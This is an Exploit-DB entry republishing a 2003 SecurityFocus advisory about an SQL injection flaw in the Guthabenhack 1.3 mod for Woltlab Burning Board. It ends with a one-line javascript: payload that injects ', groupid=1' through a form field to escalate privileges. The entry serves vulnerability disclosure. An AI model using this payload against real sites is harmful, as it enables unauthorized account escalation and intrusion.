MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection Vulnerability

2003-07-31T00:00:00
ID EDB-ID:22977
Type exploitdb
Reporter ben.moeckel@badwebmasters.net
Modified 2003-07-31T00:00:00

Description

MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/8321/info

MOD Guthabenhack For Woltlab Burning Board reported prone to an SQL injection vulnerability.

It has been reported that MOD Guthabenhack fails to sufficiently sanitize user input. It has been reported that this may allow the attacker to bypass authentication methods via SQL injection attacks.

javascript:x=document.forms[0].geworbenv;x.value=",
groupid=1";alert(x.value);